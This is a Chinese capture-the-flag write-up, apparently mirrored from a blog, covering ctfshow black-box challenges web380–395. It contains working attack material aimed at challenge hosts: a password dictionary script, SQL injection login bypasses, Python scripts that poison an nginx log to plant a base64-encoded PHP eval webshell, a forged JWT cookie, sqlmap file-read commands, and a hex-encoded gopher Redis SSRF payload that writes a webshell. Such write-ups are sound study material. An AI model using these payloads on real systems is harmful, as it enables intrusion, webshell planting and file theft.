ctfshow之黑盒测试380-395

Others 2021-12-15 02:27:34 views: null

前言

总结黑盒测试思路

可能用到的字典

xy123
admin888
/install/index.php
/clear.php
/page.php
/alsckdfy/index.php
/debug

web380——测试URL参数

image-20210912194757348

web381——找后台

image-20210912195054540

image-20210912195114230

web382、383——sql万能密码

image-20210912202520991

web384——爆破

开始过滤

爆破

字典生成:

import string
s1=string.ascii_lowercase # 小写字母a-z
s2=string.digits # 数字
f=open('dict.txt','w')
for i in s1:
	for j in s1:
		for k in s2:
			for l in s2:
				for m in s2:
					p=i+j+k+l+m
					f.write(p+"\n")
f.close()

admin xy123

web385——信息泄露

image-20210913205246502

注意协议是http否则无法访问,然后继续访问后台地址即可

web386——文件包含

image-20210913205651877

访问clear.php:

image-20210913205945334

凭经验判断参数为file:/clear.php?file=./install/lock.dat

再访问/install/?install已变样:

image-20210913210419038

然后去/alsckdfy/index.php用默认密码登陆就可以了

web387——日志写马

image-20210913210916477

给他file参数/debug/?file=/etc/passwd存在本地文件包含,去包含一下日志文件?file=/var/log/nginx/access.log

image-20210913212053079

然后ua可以命令执行

也可以:

<?php unlink('/var/www/html/install/lock.dat')?>
<?php system('cat /var/www/html/alsckdfy/check.php > /var/www/html/1.txt')?>

web388——免杀

python脚本发包:

import requests
import base64
url="http://fb707431-ebb7-41c8-9ce7-57da16163fec.chall.ctf.show/"
url2="http://fb707431-ebb7-41c8-9ce7-57da16163fec.chall.ctf.show/debug/?file=/var/log/nginx/access.log"
cmd=b"<?php eval($_POST[1]);?>"
cmd=base64.b64encode(cmd).decode() #免杀处理
headers={
    
    
	'User-Agent':'''<?php system('echo {0}|base64 -d  > /var/www/html/b.php');?>'''.format(cmd)
}
print(headers)
requests.get(url=url,headers=headers)
requests.get(url2)
print(requests.post(url+'b.php',data={
    
    '1':'system("cat alsckdfy/check.php");'}).text)

web389——jwt

import requests
import base64
url="http://bf2e6fca-c437-4f5b-90c3-75b4087cfdc5.chall.ctf.show/"
url2="http://bf2e6fca-c437-4f5b-90c3-75b4087cfdc5.chall.ctf.show/debug/?file=/var/log/nginx/access.log"
cmd=b"<?php eval($_POST[1]);?>"
cmd=base64.b64encode(cmd).decode()
headers={
    
    
	'User-Agent':'''<?php system('echo {0}|base64 -d  > /var/www/html/b.php');?>'''.format(cmd),
	'Cookie':'auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYxMDQ0MDA5MSwiZXhwIjoxNjEwNDQ3MjkxLCJuYmYiOjE2MTA0NDAwOTEsInN1YiI6ImFkbWluIiwianRpIjoiYzNlM2U5NjQ4OGI3NWY0MzY4YmE4Njg0ZTRjZWJlZTQifQ.hEV8CkkdvhKsNL_OrssrBzjzstVhq7_sQNefiuplSqU'
}
print(headers)
requests.get(url=url,headers=headers)
requests.get(url2,headers=headers)
print(requests.post(url+'b.php',data={
    
    '1':'system("cat alsckdfy/check.php");'},headers=headers).text)

web390

在page.php页面存在sql注入

sqlmap一句话搞定
sqlmap -u http://fdbabc63-b2f3-4050-8b2e-9f5ee609119a.chall.ctf.show/page.php?id=2 --file-read /var/www/html/alsckdfy/check.php --batch
运行完会将文件保存在你的本地,直接访问就拿到flag

web391、392

sqlmap继续:

sqlmap -u http://042a780b-dfd3-4bd9-861c-81661b2915e0.chall.ctf.show/search.php?title=1 --file-read /var/www/html/alsckdfy/check.php --batch

image-20210914100321171

web393

出现了一个搜索引擎image-20210915143958686

url为:/link.php?id=4

是有参数的,所以基本可以肯定是与数据库有连接的,可以利用上一题的注入点来进行insert注入或者update注入,并利用ssrf来读取本地文件:a';update link set url='file:///flag' where id = 1;#

image-20210915145146426

表名字link可以跑出来

web394、395

方法一:

a';update link set url=0x66696c653a2f2f2f7661722f7777772f68746d6c2f616c73636b6466792f636865636b2e706870 where id = 1;#

16进制为file:///var/www/html/alsckdfy/check.php

image-20210915150151456

方法二:

利用gopherus来做redis服务的ssrf

由于制作出来的payload字符串数量过多,所以需要修改列url的类型:a';alter table link modify column url text;#

然后利用ssrf的web360的payload直接打就可以了:a' update link set url=0x676f706865723a2f2f3132372e302e302e313a363337392f5f2532413125304425304125323438253044253041666c757368616c6c2530442530412532413325304425304125323433253044253041736574253044253041253234312530442530413125304425304125323432382530442530412530412530412533432533467068702532306576616c2532382532345f504f5354253542312535442532392533422533462533452530412530412530442530412532413425304425304125323436253044253041636f6e666967253044253041253234332530442530417365742530442530412532343325304425304164697225304425304125323431332530442530412f7661722f7777772f68746d6c2530442530412532413425304425304125323436253044253041636f6e666967253044253041253234332530442530417365742530442530412532343130253044253041646266696c656e616d65253044253041253234372530442530416162632e706870253044253041253241312530442530412532343425304425304173617665253044253041253041 where id = 2;#然后访问link.php?id=2就会生成abc.php 密码是1

Guess you like

Origin blog.csdn.net/qq_50589021/article/details/120309793
Recommended
Ranking
SpringBoot-integrate redis
[Sword pointing to offer] Interview question 03: Repeated numbers in an array
Arrangement "Offer Penalty for prove safety" string
Browser prevent the automatic generation of fill and Echo have been saved account solutions
Work hard and never slacken——2022 Yinmai Information Year-End Summary
Install jdk7 on Linux system
App common dependency management tools
EduCoder-Web程序设计基础-html5— 给表单组件添加说明-第1关:label标签相关概念
Machine learning - clustering - density clustering algorithm notes
Ant's large model is exposed, AI+ finance enters the "big model" era
Daily
More
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)
2024-04-21(0)

Code World

© 2018 codetd.com